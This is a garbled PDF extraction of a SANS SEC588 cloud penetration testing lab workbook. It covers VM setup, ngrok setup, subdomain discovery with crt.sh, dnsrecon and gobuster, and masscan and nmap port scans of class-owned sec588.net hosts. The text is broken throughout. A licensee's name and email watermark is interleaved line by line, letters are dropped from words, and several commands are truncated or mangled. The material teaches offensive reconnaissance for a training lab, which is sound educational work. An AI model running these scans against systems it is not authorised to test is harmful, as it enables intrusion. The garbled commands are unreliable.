SEC588 Workbook

© SANS Institute 2020 SEC588 | CLOUD PENETRATION TESTING
3e1e3b497543e6c11ac8e4188959c93e
20
Workbook
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
se
n
ce
Li
live
THE MOST TRUSTED SOURCE FOR INFORMATION SECURITY TRAINING, CERTIFICATION, AND RESEARCH | sans.org
Licensed To: Gregg Harris <pauljones166@outlook_com> July 28, 2020

© SANS Institute 2020
Copyright © 2020 Moses Frost. All rights reserved to Moses Frost and/or SANS Institute.
PLEASE READ THE TERMS AND CONDITIONS OF THIS COURSEWARE LICENSE AGREEMENT
("CLA") CAREFULLY BEFORE USING ANY OF THE COURSEWARE ASSOCIATED WITH THE SANS
COURSE. THIS IS A LEGAL AND ENFORCEABLE CONTRACT BETWEEN YOU (THE “USER”) AND
SANS INSTITUTE FOR THE COURSEWARE. YOU AGREE THAT THIS AGREEMENT IS
ENFORCEABLE LIKE ANY WRITTEN NEGOTIATED AGREEMENT SIGNED BY YOU.
3e1e3b497543e6c11ac8e4188959c93e
With the CLA, SANS Institute hereby grants User a personal, non-exclusive license to use the Courseware
subject to the terms of this agreement. Courseware includes all printed materials, including course books
and lab workbooks, as well as any digital or other media, virtual machines, and/or data sets distributed by
SANS Institute to User for use in the SANS class associated with the Courseware. User agrees that the
20
CLA is the complete and exclusive statement of agreement between SANS Institute and you and that this
20
CLA supersedes any oral or written proposal, agreement or other communication relating to the subject
matter of this CLA.
,
28
ly
BY ACCEPTING THIS COURSEWARE, YOU AGREE TO BE BOUND BY THE TERMS OF THIS CLA. BY
Ju
ACCEPTING THIS SOFTWARE, YOU AGREE THAT ANY BREACH OF THE TERMS OF THIS CLA MAY
CAUSE IRREPARABLE HARM AND SIGNIFICANT INJURY TO SANS INSTITUTE, AND THAT SANS
>
INSTITUTE MAY ENFORCE THESE PROVISIONS BY INJUNCTION (WITHOUT THE NECESSITY OF
om
POSTING BOND) SPECIFIC PERFORMANCE, OR OTHER EQUITABLE RELIEF.
_c
ok
If you do not agree, you may return the Courseware to SANS Institute for a full refund, if applicable.
23169600 ou
tlo
User may not copy, reproduce, re-publish, distribute, display, modify or create derivative works based upon
all or any portion of the Courseware, in any medium whether printed, electronic or otherwise, for any
@
purpose, without the express prior written consent of SANS Institute. Additionally, User may not sell, rent,
66
lease, trade, or otherwise transfer the Courseware in any way, shape, or form without the express written
s1
consent of SANS Institute.

ne
If any provision of this CLA is declared unenforceable in any jurisdiction, then such provision shall be
ljo
Gregg Harris
deemed to be severable from this CLA and shall not affect the remainder thereof. An amendment or
au
addendum to this CLA may accompany this Courseware.

<p
SANS acknowledges that any and all software and/or tools, graphics, images, tables, charts or graphs
s
rri
presented in this Courseware are the sole property of their respective trademark/registered/copyright
Ha
owners, including:
gg
AirDrop, AirPort, AirPort Time Capsule, Apple, Apple Remote Desktop, Apple TV, App Nap, Back to My
re
Mac, Boot Camp, Cocoa, FaceTime, FileVault, Finder, FireWire, FireWire logo, iCal, iChat, iLife, iMac,
G
iMessage, iPad, iPad Air, iPad Mini, iPhone, iPhoto, iPod, iPod classic, iPod shuffle, iPod nano, iPod touch,
:
iTunes, iTunes logo, iWork, Keychain, Keynote, Mac, Mac Logo, MacBook, MacBook Air, MacBook Pro,
To
Macintosh, Mac OS, Mac Pro, Numbers, OS X, Pages, Passbook, Retina, Safari, Siri, Spaces, Spotlight,
d
There’s an app for that, Time Capsule, Time Machine, Touch ID, Xcode, Xserve, App Store, and iCloud are
se
registered trademarks of Apple Inc.

n
ce
PMP and PMBOK are registered marks of PMI.

Li
live
SOF-ELK® is a registered trademark of Lewes Technology Consulting, LLC. Used with permission.
SIFT® is a registered trademark of Harbingers, LLC. Used with permission.
Governing Law: This Agreement shall be governed by the laws of the State of Maryland, USA.
SEC588_W_F02_02
Welcome to the SANS
3e1e3b497543e6c11ac8e4188959c93e
Security 588 Labs Wiki
20
Welcome to the SANS SEC588 Lab Wiki
, 20
28
This wiki is will serve as your lab guide throughout the class. We will try and keep the labs accessible by allowing
ly
(cut and paste), as well as provide color to your labs.
Ju
>
om
This lab wiki is a work in progress, and is frequently revised by the course authors. This is bene cial to all, since
_c
you continue to get updates to lab material as we improve the quality of the exercises, correct typos, and add
ok
new exercises.
23169600 ou
tlo
The online wiki will always be updated so before class ends make sure you update the wiki prior to leaving class
@
66
so you have the most recent version on your computer. The computer's local wiki will always remain.
s1
ne
Accessing the Digital Edition of the Lab Wiki

ljo
Gregg Harris
au
To access the digital edition of the lab wiki from the Slingshot Linux VM, open the Firefox browser. The home
<p
page will display this text, and allow you to navigate to the course lab exercises.
s
rri
Ha
Installing your Virtual Machine

gg
re
You should have been provided a Download link in your portal with Day0 Instructions. Please review those
G
instruction to have the Virtual Machine Installed.

:
To
d
The Installation Steps in a reduced manner are as follows:

n se
ce
Copy over the three virtual machine les over from the USB
Li
From VMWare Fusion, Workstation, or Player, choose File | Open

Select the ovf le 'SEC588-20-1.ovf' live
Once it is imported you will need to make sure the VM is using NAT mode.
The default username and password is sec588 \ sec588
You should be able to Open Firefox to test connectivity by connecting to: http://www.sans.org
© 2020 Moses Frost 1

Updating the Lab Wiki – Linux
The Virtual Machine should be connected to the Lab Environment.
3e1e3b497543e6c11ac8e4188959c93e
Once the Section 1 or Day 1 labs are completed you should be able to update the wiki by performing the
following commands:
20
, 20
28
ly
Ju
sec588@slingshot:~$ wiki-updater.sh ()
>
om
_c
ok
That's it! With this one step you will always have the most current lab materials.
Conventions
23169600 @
ou
tlo
66
The following typographical conventions are used throughout the labs:

s1
ne
ljo
Italic
Gregg Harris
au
Indicates new terms and items of emphasis.

<p
s
Constant width
rri
Used for terminal output and within paragraphs to refer to tools or other elements such as variables,
Ha
function names, statements, keywords, etc.

gg
re
| (vertical bar)
G
The vertical bar is used to indicate steps necessary for navigating through menus (Edit | Paste)
:
To
d
Code blocks are used to denote output from tools. Content that is bold represents commands you type.
nse
ce
For example:
Li
live
# run_this_command
output from the tool
2 © 2020 Moses Frost

This class uses dynamic URLs meaning that you will not be able to see the URL for your class-subdomain in the
local wiki. The URL for the class subdomain we will attempt to 'auto- ll' through automation in the tools we
provide for you online.
3e1e3b497543e6c11ac8e4188959c93e
In some cases, the commands you type will call for information that you supply (e.g., that we don't know). In
these cases, the content that you supply is noted in italics: yourinput . Replace yourinput with the information
you supply as described in the exercise.
20
20
This icon signi es a tip, suggestion, warning, or a general note.
,
28
ly
Ju
Course and Lab Feedback
>
om
We are always excited to hear your feedback on the course materials. Is there a bug we need to squash? Do you
_c
have a suggestion for a new awesome tool that we just have to see? Please let us know.
ok
23169600
You can also reach out to Moses Frost directly:
@
ou
tlo
66
Moses Frost – moses@moses.io (mailto:moses@moses.io)

s1
ne
Thank you!!
ljo
Gregg Harris
au
_Update: 2020-007
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

Getting Started
3e1e3b497543e6c11ac8e4188959c93e
If you can read this, you are more than likely already on the Classroom Slingshot VM. Welcome to SEC588 Cloud
Penetration Testing!
20
20
If you are an ondemand student, you should be getting access to labs for the next 4 months. Check your SANS
Account for continued access.
,
28
ly
Ju
One of the features of this class is an online wiki. You may not have found the online wiki, however, it is
>
recommended that you have the passwords for the wiki when you do get access.
om
_c
For students in class the instructors will provide you the passwords for the wiki and the for the CTF wiki.
ok
23169600
For ondemand students you will nd this in the mylabs portal.
@
ou
tlo
66
VPN has been facilitated to ensure that you are not troubleshooting the environment at home. It is
s1
recommended that you use the VPN provided by the SANS team for a smooth lab experience.
ne
ljo
Gregg Harris
au
Use the VPN con guration found in the My Labs portal for this.
<p
s
Brief Intro
rri
Ha
Walkthrough
gg
re
G
VMware Required
:
To
d
The Class VM, Slingshot, has been thoroughly testing on VMware. While we understand that some students
se
prefer the use of other hypervisors we do not support them in the class. If they do boot and are able to work, that
n
is perfectly ne, but understand that any problems in the labs you may experience may have to do with an
ce
unsupported hypervisor so we will be asking you to use a supported hypervisor.

Li
live
Please ensure you have already downloaded and installed VMware on your system.
If you have not already installed VMware, download and install it now for your platform:
VMWare Workstation Evaluation for Windows and Linux Systems (http://bit.ly/SEC588-Lab1-1-VMware)

VMware Fusion Evaluation for OSX (http://bit.ly/SEC588-Lab1-1-Fusion)
You may be eligible for a free trial period of VMware Workstation Player or VMware Fusion.
3e1e3b497543e6c11ac8e4188959c93e
We do not support the use of other virtualization products such as VirtualBox or Hyper-V in this class. You are
welcome to experiment and try to use these platforms, but we cannot support any problems that may arise.
20
20
Copy the VM Files
,
28
Find the Day0 instructions to mount your ISO into your computer. Using Windows Explorer or Finder (macOS),
ly
Ju
copy the individual virtual machines les to your desktop or another convenient location. This will take several
minutes to complete.
>
om
_c
Launch the Slingshot Linux VM
ok
23169600
Launch the Slinghost Linux VM by opening VMWare Workstation and using the File|Open menu to open the .ovf
tlo
that was decompressed. If VMware indicates that the virtual machine might have been copied or moved. Select I
Copied It when prompted.
@
ou
66
s1
VMware Dialog Prompt

ne
ljo
Log In to the Slingshot Linux VM

Gregg Harris
au
<p
After the Slingshot Linux VM nishes booting, log in with the following username and password:
s
rri
Username: sec588
Ha
Password: sec588
gg
re
G
That's the last step! You can keep the Slingshot Linux VM running and continue to experiment, or shut it down
:
until you need it for a lab exercise.

To
d
n se
ce
Li
live

Lab 1.1: Connecting into
3e1e3b497543e6c11ac8e4188959c93e
our class environment.
20
Brief Intro
, 20
28
The classroom labs are all available in the Amazon Cloud or in the Azure public cloud. You have been provided
ly
with a copy of the Slingshot Virtual Machine on your USB drive. While we strive to keep the classroom
Ju
requirements to a minimum; this particular class will require that many of the tools you may use outside of class
>
be pre-con gured or pre-setup. Here is a small list of the tools you may wish to use both in the class and outside
om
of class:
_c
ok
Amazon's AWS CLI toolkit
Microsofts Azure CLI toolkit
Git
23169600 @
ou
tlo
Eyewitness
66
PACU
s1
Hydra
ne
Docker's CLI toolkit

ljo
Kubernetes Kubelet
Gregg Harris
au
Inguardians Peirates
<p
Postman
s
rri
Many of these tools require python, ruby, or C dependencies to operate we have provided a copy of the virtual
Ha
machine with the precon gured tools. This class designed to provide you with access to a cloud environment,
gg
the instructions in this class will more than likely require you to type commands into a CLI environment. Many of
re
the tools will either be console driven or at times be based on web applications. As such getting familiarity with
G
our console is essential.

:
To
d
Getting your class

n se
ce
Li
studentX live
This class will require you to have a 'Random Student Number'. This is noted as: StudentX where X is
replaced with a number. For all students to get your student number:

You can use a command line interface like so: $ curl ifconfig.me/ip
Once you have done this you can then use the following name for your labs: StudentX where the X is replaced
3e1e3b497543e6c11ac8e4188959c93e
with the number from above. You will append a 1 to the number for example:
If your IP address is 23.85.17.191 .
20
You would be: Student1191 .
,20
28
What if your IP is below 100? Your Student Number will start with 10 .
ly
Ju
If your IP Address is 23.85.17.91 then your studentX will be: student1091
>
om
Make sure you note this number down.
_c
ok
For OnDemand Students please note:
23169600 @
ou
tlo
On Demand Students will use the following nomenclature: StudentODX
66
s1
ne
Please note that we will be deleting your assets every week on Sunday night and there may be labs that need to
ljo
be completed within that timeframe.

Gregg Harris
au
<p
s
Requirements for This Lab

rri
Ha
To use this lab we recommend visiting the Wiki getting started page (Getting-Started.html) . This will walk you
gg
through the Virtual Machine Extraction process. We will be updating the wiki as we go through the lab.
re
: G
To
Try It Yourself
d
se
The following are step by step instructions to extract the virtual machine and gain familiarity with the tools that
n
ce
will be used in the class.

Li
Walkthrough live
Getting Familiar with the VM

Once the virtual machine is booted and you are logged into the SEC588 User, let's log in and get familiar with the
di erent tools that you may see on the virtual machine.
3e1e3b497543e6c11ac8e4188959c93e
Double-click the MATE Terminal and let's get familiar with the shell layout. Most of this Virtual Machines custom
tools will be found in the /opt directory
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Below is a small example of the tools that we will be looking at in this lab and get familiar with throughout the
gg
class.
re
:G
To
d
n se
ce
Li
live

.-.
3e1e3b497543e6c11ac8e4188959c93e
|
\opt
|----az
<- root of the tree
<--- optional directory
<- This is the Azure CLI Tools
|----burp <- This is the directory with the Burpsuite tools
|----eyewitness <- This is the eyewitness directory
20
|----masscan <- This is the Massscan Directory
20
|----postman <- This is the Postman Directory
|----pacu <- This is the PACU Directory
,
28
ly
Ju
>
om
Getting familiar with Cloud SDK Cli's.
_c
From the MATE prompt lets change into the az directory to get familiar with the Azure CLI SDK.
ok
23169600 @
ou
tlo
66
$ az help
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

The Azure SDK provides you the capability of using their API's as native CLI's. We will use this functionality later
in the class. Almost any component in the Azure Cloud can be instrumented with the Azure CLI SDK, as you can
see above, the capability of the CLI Toolkit is vast and will provide us capabilities in the upcoming days.
3e1e3b497543e6c11ac8e4188959c93e
The next SDK we want to get used to working with is the aws sdk. Let's ensure that it works by typing the
following:
20
,20
28
$ aws help
ly
Ju
>
om
You should have the help output appear.
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
se
n
Postman
ce
Li
live
Postman is another tool that we will use in this class, ensuring that it launches would also be a good idea.
Postman will be introduced tomorrow. Change into the /opt directory and open postman.

~ cd /opt
3e1e3b497543e6c11ac8e4188959c93e
$ cd postman
$ ./Postman
20
20
,
28
ly
Ju
>
om
_c
ok
di erent and new lab.
23169600 @
ou
tlo
If it opens it should show up like the screenshot below. We will be ok to close this screen as it will be used in a
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Setting up the environment with nGrok

Li
live
Throughout the week we will be discuss ngrok. While we have not introduced it to you yet, we do want to get
ready for this step. In order to do so, let's register with a valid and free ngrok account.
Let us begin by working on getting us a valid ngrok key. To do this open Firefox:

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
Navigate to
SIGN UP
23169600 tlo
www.ngrok.com . This will provide you with a page to sign up with a valid ngrok account, slick
@
ou
66
s1
ne
ljo
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Once you are logged in, you can now copy the authtoken in step 3.
Ha
gg
re
: G
To
d
n se
ce
Li
live
The next part will to be to add the authtoken and test it. To do this you will need to open a terminal

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
From here you will need to type the following:

ljo
Gregg Harris
au


s
rri
ngrok http 9999

Ha
gg
If this worked correctly you should see a screenshot somewhat similar to below:
re
: G
To
d
nse
ce
Li
live
The URL is random for every student. Let's see how we can use this as a webserver

Open another MATE terminal:
$ cd /tmp
3e1e3b497543e6c11ac8e4188959c93e
$ python -m 'SimpleHTTPServer' 9999
Now go back to the Firefox Browser and go to:
20
20
http://<random-ngrok-hostname>.ngrok.io
,
28
ly
The attack we are going to execute will look like the diagram below, and yes, it is a circular like attack:
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G
What you should see on the screen is something like so:

:
To
d
n se
ce
Li
live
Replay of this lab

Conclusion
This lab is the beginning point for us to nd and obtain access into our environments. This lab will also ensure
that we have a solid working system that we can use both inside the classroom and potentially outside the
3e1e3b497543e6c11ac8e4188959c93e
classroom. If needed you can shutdown this image and take a snapshot with the image turned o . This will help
you restore to a pristine day 1 image if needed.
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live

Lab 1.2: Lab Discovery
3e1e3b497543e6c11ac8e4188959c93e
Brief Intro
20
In day 1 we will have a mission to provide context the importance of reconnaisance at scale. This Wiki needs to
be updated, and you need to discover both the keys to the Wiki as well as the location of our actual labs. We have
20
decided to make this particular lab a treasure hunt to be able to show you how discovery at scale is meant to
,
28
work. This lab will showcase the ability to discover the associated domains that are potentially available to an
environment and then use a custom wordlist to bruteforce the discover of our lab targets. In a later lab we will
ly
Ju
nd additional items that we may be able to use to gain wiki access.
>
om
_c
ok
23169600 ou
tlo
Please note that SANS understands that some folks will have challenges with their ISP and running scans, for
example this wordlist scan. Even at times when we attempt to hardset your settings in DNS you may nd that
@
scans are not running correctly. As such we are going to attempt to provide workarounds in class. You may nd
66
that you may have to run a VPN connection in order to perform scans.
s1
ne
ljo
In this lab we will be requiring the SEC588 Virtual Machine to be extracted. It is also going to require internet
Gregg Harris
au
connectivity. You will need to be able to load crt.sh (http://crt.sh) . In addition we will be using a wordlist found in
<p
the /home/sec588/files/wordlist directory. You will need to create a le in this directory for hosts.
s
rri
You will also be using a tool called dnsrecon.py that will be the tool to help you discover and enumerate hosts.
Ha
gg
This is nal lab of your on-vm wiki! We need to accomplish and nish the Day 1 labs to get full access to our wiki
re
from hear on out.
: G
To
Try It Yourself
d
nse
ce
This lab requires you to use crt.sh to nd all the subdomains in the crt.sh (http://crt.sh) website.
Li
This lab also will require that you go to sec588.net

live and use it as seed value for our lab.
There is a tool called dnsrecon.py that will be able to parse the crt.sh for you and provide you with a list of
subdomains. You can nd this tool in
$ /opt/dnsrecon

Based on these subdomains you should be able to discover the hosts. To do this instead of using one of methods
for creating subdomain lists let's leverage our own.
3e1e3b497543e6c11ac8e4188959c93e
Place all of the hosts that are found in the output of dnrecon.py into a le called
/home/sec588/files/workdir/urls.txt . You can do this with your favorite editor. If your not familiar with
Linux then run the following command:
20
$ gedit /home/sec588/files/workdir/urls.txt
,20
Place the entries into this le and save it then close gedit.
28
ly
Ju
Hint: You may want to start with the type of -t crt .
>
om
_c
Walkthrough
ok
Gathering subdomains
23169600 @
ou
tlo
66
Open a MATE shell and let's re-run dnsrecon.py.

s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

We have created a wordlist using Commonspeak2 which we will discuss further in Day2. For now, Let's take a
look at that wordlist. You can use less to read through the le, if you are not familiar with less, you can use
q to exit when you're done.
3e1e3b497543e6c11ac8e4188959c93e
$ less /home/sec588/files/wordlists/subdomains.txt
We can also see how long this wordlist:
20
20
$ wc -l /home/sec588/files/wordlists/subdomains.txt
,
28
This is a fairly lengthy list as we can see over 70,000 entries. We will discuss the creation of this wordlist on Day
ly
Ju
2. If we attempt to work through this particular list our lab would take over 1 hour! We have shortened this list for
you with the following command:
>
om
_c
head -5000 /home/sec588/files/wordlists/subdomains.txt >
ok
/home/sec588/files/wordlists/subdomains-5k.txt
Running DNS Recon

23169600 @
ou
tlo
66
Now that we are armed with a wordlist let's attempt to try and gure out which one of our domains we will be
s1
using for class.

ne
ljo
Gregg Harris
Run dnsrecon with the following command line arguments:
au
<p
$ cd /opt/dnsrecon
s
rri
Ha
Note that you will see [+] 0 Records Found but will have a list of "Subdomains". With these subdomains you can
gg
take EACH one to nd the subdomain for you to use with class.
re
:G
To
$ ./dnsrecon.py --iw -d sec588.net -t crt

d
n se
ce
Li
live

What do the commands do?
--iw ignore wildcards
3e1e3b497543e6c11ac8e4188959c93e
-d specify a domain, in this case sec588.net
-t specify a type of dnsrecon to run in our case lets check for crt.sh
20
20
This should output several discovered subdomains. The class set of wordlists will be growing every class run so
,
28
do not be surprised with a very large list.
ly
Ju
You may have to bruteforce the rst few subdomains to nd the one for class, it may be the newest one but it
>
could also be a few more down. Just keep this in mind as we work through this particular lab. At the time of
om
writting it was our latest entry which was but in your class it will be di erent.
_c
ok
Figuring out which domain is truly your's
23169600 ou
tlo
How to tell you have the right domain? We have hidden the class identi er in a TXT record. For example,
@
ondemand students can perform the following commands to see if they have the right domain:
66
s1
ne
ljo
Gregg Harris
au
#!/bin/bash ()
 set type=TXT ()

rri
/> <class-subdomain>.sec588.net ()
Ha
gg
re
G
Alternatively, we included an 'Automated Way' to check to make sure that you have found the appropriate
:
To
subdomain:
d
se
Step 1: Run the command and output the results to a text le:
n
ce
Li
live
$ ./dnsrecon.py --iw -d sec588.net -t crt > ~/files/workdir/dnsrecon-output.txt
Step 2: Run a command to trim down the ‘output.txt’ le to only have the sub-domains and output to a new le,
‘list.txt’

$ cat ~/files/workdir/dnsrecon-output.txt | cut -c9- | cut -f1 -d ' ' | grep sec588 >
~/files/workdir/cutlist.txt
3e1e3b497543e6c11ac8e4188959c93e
Step 3: Run this bash shell one-liner to use ‘dig’ to look for special txt record to nd valid domains
$ for i in $(cat ~/files/workdir/cutlist.txt); do echo "[+] Querying $i"; dig -t txt +short
$i;done
20
20
If the answer is:
,
28
ly
<class-subdomain>.sec588.net text = "ondemand"
Ju
>
You have located the correct subdomain!
om
_c
If you wish to save this as a environment variable this may help you with labs! export $CLASS_SUBDOMAIN=
ok
23169600
<class-subdomain>
tlo
ou
Save this in bash for reboots:
@
echo $CLASS_SUBDOMAIN=<class-subdomain> >> /home/sec588/.bashrc
66
s1
An example has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/ les/lab12-subdomain-

ne
output.txt) or the local wiki (http://localhost/wiki/ les/lab12-dnsrecon-output.txt)

ljo
Gregg Harris
au
<p
We will now run the following command to be able to dive into that subdomain and scrape out the individual
s
hosts. If these commands do not work look for the output le example below.
rri
Ha
$ ./dnsrecon.py --iw -d <class-subdomain>.sec588.net -D

gg
/home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt --threads 10 -c

re
/home/sec588/files/workdir/dnsrecon.csv
: G
To
d
n se
ce
Li
live
What do our new commands do?

-D use a wordlist in the above example: /home/sec588/files/workdir/subdomains-5k.txt which was
created for you
3e1e3b497543e6c11ac8e4188959c93e
-t use the following modes of operation
and also use the crt.sh scan
brt,crt is used to instruct the system to brute force a wordlist
-c output to csv to save results and view/use them later
20
20
--threads increase the number of threads from 1 to in our example 10
,
28
We now see that we have found the following URLs, remember YOUR subdomains will be di erent as they are in
ly
Ju
every class:
>
om
www.<class-subdomain>.sec588.net
_c
ok
wiki.<class-subdomain>.sec588.net
blog.<class-subdomain>.sec588.net
23169600 @
ou
tlo
66
s1
dev.<class-subdomain>.sec588.net
ne
ljo
Gregg Harris
An example has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/ les/lab12-dnsrecon-
au
or the local wiki (http://localhost/wiki/ les/lab12-dnsrecon-output.txt)

<p
output.txt)
s
rri
Ha
Please make a note of these hostnames we be referring to these hosts throughout the class, you can use any
notepad application you are comfortable with. If you are not sure which one you can use either gedit or
gg
nano .
re
: G
nano /home/sec588/files/workdir/urls.txt
To
d
se
Replay of this lab

n
ce
Li
Conclusion
live
In this lab, we have discovered how to enumerate hosts with dnsrecon.py we could also use alternative tools like
gobuster but we will be using this tool in another lab.
The next few labs will be available in print and on our online print!

Use the following URL for the next few labs:
http://wiki.<class-subdomain>.sec588.net
3e1e3b497543e6c11ac8e4188959c93e
For the next lab we will be using the online wiki so that we can x our class wiki
Why This Lab Is Important
20
20
Often time as attackers we may want to discover subdomains and hosts within those domains but we may run
,
28
into several issues. These could include false postives, shunning, or other false negatives. We need to
understand how we can use tools, weed out the false positives and attempt to determine if there is an
ly
Ju
opportunity for attacker to uncover our sites.
>
om
Bonus (If Time Permits or Homework)
_c
ok
As an additional lab if you wish to nd out about how subdomain enumeration works you may try and use the
following gobuster commands: 23169600 @
ou
tlo
66
$ /opt/gobuster/gobuster dns -d <class-subdomain>.sec588.net -w

s1
ne
ljo
This is an additional resource will use in another lab for other types of enumeration.
Gregg Harris
au
<p
Additional Resources
s
rri
Ha
Check out SANS SEC542 for additional resources on how to do web enumeration (https://www.sans.org/course/web-
.
gg
app-penetration-testing-ethical-hacking)
re
: G
To
d
n se
ce
Li
live

Lab 1.3: Portscans at Scale
3e1e3b497543e6c11ac8e4188959c93e
Brief Intro
20
Portscans at scale can be very critical for discovery of new servers, and more importantly services, that may be
littered across many cloud environments across the internet. This lab will attempt to uncover what exposed
20
ports and by relation what default con gurations we can nd in our cloud environment. This lab will show us the
,
28
strenghts and the limitations of each of our tools. We will also display the methodology that we can employ in
each one of the tools to gather more and more information from our cloud environments.
ly
Ju
>
Recall that we are using the information from our previous lab to generate the target list from this lab. Example:
om
_c
dnsrecon -> provides hostsnames with ips -> feeding into -> massscan and then -> nmap .
ok
Requirements for This Lab 23169600 @
ou
tlo
66
s1
connectivity.
ne
ljo
Gregg Harris
This lab will be hosted and found on:
au
<p
s
rri
Ha
Try It Yourself
gg
re
To attempt this class without hints the following methodology should be followed:
: G
To
1. Look at the results from our dnsrecon.py script and locate all the A records that have just an IP address.
d
2. Place these IP's in a le to be referenced later such as:

se
/home/sec588/files/workdir/ips.txt
3. Run the masscan command with --top-ports
n
ce
4. Run the masscan command with a list of ports such that the following ports are included: 20-25,79-80,8000-
Li
9000,6739,1433,1434,5432,3306,27017
live
5. Follow this up by running nmap with the found ports running a script scan.
6. Attempt to run the script scan with additional tools that match the found the ports that are matched.
7. Save the results in a output directory to be looked at with a visual editor.
Walkthrough

Gathering hosts to scan
While nmap does a fairly good job of helping automate and locate hosts on a large network, masscan acts a little
di erently. It does not do DNS resolution as an example. Due to the targeting that we must have in our lab we
3e1e3b497543e6c11ac8e4188959c93e
will be providing masscan a very simple set of hosts to scan. To do this, we will look back our previous lab. Let's
gather some hosts to scan.
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G
Remember that our subdomain will be different each class

:
To
d
$ cd /opt/dnsrecon
n se
ce
ONLY DO THIS IF YOU HAVE NOT COMPLETED LAB 1.2

Li
live
/home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt --threads 10 -c
Now let's create a list of IP addresses based on these CSV entries, we will provide you with two options to do this,
either one will work, this is based on preference.

Option 1: Use gedit and manually enter the IP addresses into a text le:
$ gedit /home/sec588/files/workdir/ips.txt
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 tlo
We will reference this le in both nmap and masscan using the -iL keyword.
@
ou
Option 2: Use the following awk statement to manually create the le:
66
s1
$ cat /home/sec588/files/workdir/dnsrecon.csv | awk -F, '{ print $3 }' | grep -v Address |

ne
grep -v '^$' | sort -u > /home/sec588/files/workdir/ips.txt

ljo
Gregg Harris
au
What we have done here is taken our list of known IP addresses that we found through DNS reconassaince and
<p
start to scan then. Some of these will be generic AWS services that will yield no value, if you can identify those
s
you may be able to discard them.

rri
Ha
Masscan
gg
re
We will start our widescale scan with Masscan. We will do this as it is designed to identify the live hosts and their
G
listening ports quickly. Masscan does have some limitations to how it operates. It is design to:
:
To
d
Scan the internet at scale

se
Scan a small set of ports but a large number of addresses.

n
ce
Li
live
We will be using some of these features speci cally to nd what ports are open across our clouds. Let's start by
scanning our ip addresses and seeing what default ports masscan nds:
$ cd /opt/masscan

An example of the output has been provided in our online wiki (http://wiki.<class-subdomain>.sec588.net/ les/lab13-
masscan-ips1.txt) or the local wiki (http://localhost/wiki/ les/lab13-masscan-ips1.txt)
3e1e3b497543e6c11ac8e4188959c93e
$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p1-1024
This should scan the rst 1024 ports on a host. Let's take a look at we discover.
20
20
,
28
ly
Ju
>
om
_c
ok
Just to review what this does:
23169600 @
ou
tlo
-iL This speci es a le as input
66
s1
This speci es a list of ports.

ne
-p
ljo
Gregg Harris
au
Masscan in this example will discover a few ports on this host. This particular host has port 80 and 22 open. This
<p
scan is almost the same as our --top-ports feature in masscan as --top-ports is only ports 1-1000. Let's expand
this to include 5,000 ports. The command below is 4 zero's.
s
rri
Ha
gg

re
: G
To
If this command below takes a long time, such as 5 minutes CTRL-C to abort
d
se
$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p1-5000

n
ce
Li
live

Once it is complete you will nd a new port that is found, 6379. Let's try and expand our search further by
creating a list of ports that include well de ned database ports:
3e1e3b497543e6c11ac8e4188959c93e
20
$ sudo ./masscan -iL /home/sec588/files/workdir/ips.txt -p20-
20
80,443,445,1433,3306,6379,5432,27017
,
28
ly
Ju
>
om
_c
ok
23169600 ou
tlo
We now see several ports open that are interesting. Let's follow this up by a very thorough and narrow nmap
@
scan including speci c nse scripts:
66
s1
ne
ljo
or the local wiki (http://localhost/wiki/

nmap-scan1.txt)
Gregg Harris les/lab13-nmap-scan1.txt)

au
<p
s
$ sudo nmap -iL /home/sec588/files/workdir/ips.txt -p 80,22,6379,27017 -A -oA

rri
/home/sec588/files/workdir/scan1
Ha
gg
To review what this does:

re
G
This is the le to use

:
-iL
To
d
se
-A This enables script scan, traceroute, os ngerprinting, and version scanning.

n
ce
This scans a speci c set of ports that we discovered with masscan.

Li
-p
-oA
live
This enables saving the output with the lename of scan1 and will include nmap format, grep format,
and xml format.
What you will notice is that this command will ll up the entire terminal window

3e1e3b497543e6c11ac8e4188959c93e
This scan scrolls o the screen so let's open our scan1.nmap le in gedit.
$ gedit /home/sec588/files/workdir/scan1.nmap
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
G
This shows us a few things.

:
To
d
1. A Redis database is found but none of the script scans red for it
se
2. A MongoDB database was found and there are databases that are enumerable in the scan results.
n
ce
Li
While this scan is valuable in it's default state it does not check the redis database that you may have noticed
live
was found in this environment. Let's enable some redis and mongodb checks.
nmap-scan1.txt) or the local wiki (http://localhost/wiki/ les/lab13-nmap-scan1.txt)

$ sudo nmap -iL /home/sec588/files/workdir/ips.txt -p 80,22,6379,27017 -oA
